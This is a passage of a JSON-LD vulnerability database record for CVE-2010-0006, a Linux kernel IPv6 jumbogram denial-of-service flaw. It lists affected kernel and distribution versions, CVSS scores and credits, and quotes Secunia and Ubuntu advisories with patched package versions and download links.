    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201001-0659",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.1"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.0"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel 2.6.27-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "desktop video device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.6.32.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Olli Jarva\r\nTuomo Untinen",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2010-0006",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2010-0006",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-42611",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-0006",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201001-263",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42611",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.32.4, when network namespaces are enabled, allows remote attackers to cause a denial of service (NULL pointer dereference) via an invalid IPv6 jumbogram, a related issue to CVE-2007-4567. Linux The kernel IPv6 jumbogram There is a vulnerability in the processing of. \nAttackers can exploit this issue to cause a kernel panic, denying service to legitimate users. This vulnerability is related to CVE-2007-4567. ----------------------------------------------------------------------\n\n\n\nSecunia integrated with Microsoft WSUS \nhttp://secunia.com/blog/71/\n\n\n\n----------------------------------------------------------------------\n\nTITLE:\nFedora update for kernel\n\nSECUNIA ADVISORY ID:\nSA38168\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/38168/\n\nDESCRIPTION:\nFedora has issued an update for the kernel. This fixes a\nvulnerability, which can be exploited by malicious people to cause a\nDoS (Denial of Service). \n\nSuccessful exploitation requires that network namespaces are enabled. \n\nSOLUTION:\nApply updated packages via the yum utility (\"yum update kernel\"). \n\nORIGINAL ADVISORY:\nFEDORA-2010-0823:\nhttps://admin.fedoraproject.org/updates/F12/FEDORA-2010-0823\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. ===========================================================\nUbuntu Security Notice USN-894-1          February 05, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138,\nCVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538,\nCVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.82\n  linux-image-2.6.15-55-686       2.6.15-55.82\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.82\n  linux-image-2.6.15-55-hppa32    2.6.15-55.82\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.82\n  linux-image-2.6.15-55-hppa64    2.6.15-55.82\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-itanium   2.6.15-55.82\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.82\n  linux-image-2.6.15-55-k7        2.6.15-55.82\n  linux-image-2.6.15-55-mckinley  2.6.15-55.82\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc   2.6.15-55.82\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-server    2.6.15-55.82\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.82\n  linux-image-2.6.15-55-sparc64   2.6.15-55.82\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.82\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-27-386       2.6.24-27.65\n  linux-image-2.6.24-27-generic   2.6.24-27.65\n  linux-image-2.6.24-27-hppa32    2.6.24-27.65\n  linux-image-2.6.24-27-hppa64    2.6.24-27.65\n  linux-image-2.6.24-27-itanium   2.6.24-27.65\n  linux-image-2.6.24-27-lpia      2.6.24-27.65\n  linux-image-2.6.24-27-lpiacompat  2.6.24-27.65\n  linux-image-2.6.24-27-mckinley  2.6.24-27.65\n  linux-image-2.6.24-27-openvz    2.6.24-27.65\n  linux-image-2.6.24-27-powerpc   2.6.24-27.65\n  linux-image-2.6.24-27-powerpc-smp  2.6.24-27.65\n  linux-image-2.6.24-27-powerpc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-rt        2.6.24-27.65\n  linux-image-2.6.24-27-server    2.6.24-27.65\n  linux-image-2.6.24-27-sparc64   2.6.24-27.65\n  linux-image-2.6.24-27-sparc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-virtual   2.6.24-27.65\n  linux-image-2.6.24-27-xen       2.6.24-27.65\n\nUbuntu 8.10:\n  linux-image-2.6.27-17-generic   2.6.27-17.45\n  linux-image-2.6.27-17-server    2.6.27-17.45\n  linux-image-2.6.27-17-virtual   2.6.27-17.45\n\nUbuntu 9.04:\n  linux-image-2.6.28-18-generic   2.6.28-18.59\n  linux-image-2.6.28-18-imx51     2.6.28-18.59\n  linux-image-2.6.28-18-iop32x    2.6.28-18.59\n  linux-image-2.6.28-18-ixp4xx    2.6.28-18.59\n  linux-image-2.6.28-18-lpia      2.6.28-18.59\n  linux-image-2.6.28-18-server    2.6.28-18.59\n  linux-image-2.6.28-18-versatile  2.6.28-18.59\n  linux-image-2.6.28-18-virtual   2.6.28-18.59\n\nUbuntu 9.10:\n  kernel-image-2.6.31-108-imx51-di  2.6.31-108.21\n  linux-image-2.6.31-19-386       2.6.31-19.56\n  linux-image-2.6.31-19-generic   2.6.31-19.56\n  linux-image-2.6.31-19-generic-pae  2.6.31-19.56\n  linux-image-2.6.31-19-ia64      2.6.31-19.56\n  linux-image-2.6.31-19-lpia      2.6.31-19.56\n  linux-image-2.6.31-19-powerpc   2.6.31-19.56\n  linux-image-2.6.31-19-powerpc-smp  2.6.31-19.56\n  linux-image-2.6.31-19-powerpc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-server    2.6.31-19.56\n  linux-image-2.6.31-19-sparc64   2.6.31-19.56\n  linux-image-2.6.31-19-sparc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-virtual   2.6.31-19.56\n  linux-image-2.6.31-211-dove     2.6.31-211.22\n  linux-image-2.6.31-211-dove-z0  2.6.31-211.22\n  linux-image-2.6.31-304-ec2      2.6.31-304.10\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06)\nthe kernel updates have been given a new version number, which requires\nyou to recompile and reinstall all third party kernel modules you\nmight have installed. If you use linux-restricted-modules, you have to\nupdate that package as well to get modules which work with the new kernel\nversion. Unless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-server, linux-powerpc), a standard system\nupgrade will automatically perform this as well. \n\nDetails follow:\n\nAmerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\nfilesystems did not correctly check certain disk structures. If a user\nwere tricked into mounting a specially crafted filesystem, a remote\nattacker could crash the system or gain root privileges. (CVE-2009-4020,\nCVE-2009-4308)\n\nIt was discovered that FUSE did not correctly check certain requests. \nA local attacker with access to FUSE mounts could exploit this to\ncrash the system or possibly gain root privileges.  Ubuntu 9.10 was not\naffected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest\ninstructions.  A local attacker in a guest could exploit this to\ntrigger high scheduling latency in the host, leading to a denial of\nservice.  Ubuntu 6.06 was not affected. (CVE-2009-4031)\n\nIt was discovered that the OHCI fireware driver did not correctly\nhandle certain ioctls.  A local attacker could exploit this to crash\nthe system, or possibly gain root privileges.  Ubuntu 6.06 was not\naffected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle\nO_ASYNC on locked files.  A local attacker could exploit this to gain\nroot privileges.  Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e\nnetwork drivers did not correctly check the size of Ethernet frames. \nAn attacker on the local network could send specially crafted traffic\nto bypass packet filters, crash the system, or possibly gain root\nprivileges. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that \"print-fatal-signals\" reporting could show\narbitrary kernel memory contents.  A local attacker could exploit\nthis, leading to a loss of privacy.  By default this is disabled in\nUbuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\nhandle jumbo frames.  A remote attacker could exploit this to crash the\nsystem, leading to a denial of service.  Only Ubuntu 9.04 and 9.10 were\naffected. (CVE-2010-0006)\n\nFlorian Westphal discovered that bridging netfilter rules could be\nmodified by unprivileged users.  A local attacker could disrupt network\ntraffic, leading to a denial of service. (CVE-2010-0007)\n\nAl Viro discovered that certain mremap operations could leak kernel\nmemory.  A local attacker could exploit this to consume all available\nmemory, leading to a denial of service. (CVE-2010-0291)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz\n      Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc\n      Size/MD5:     2921 682576890de917043eccf6fc9398aed2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb\n      Size/MD5:    96386 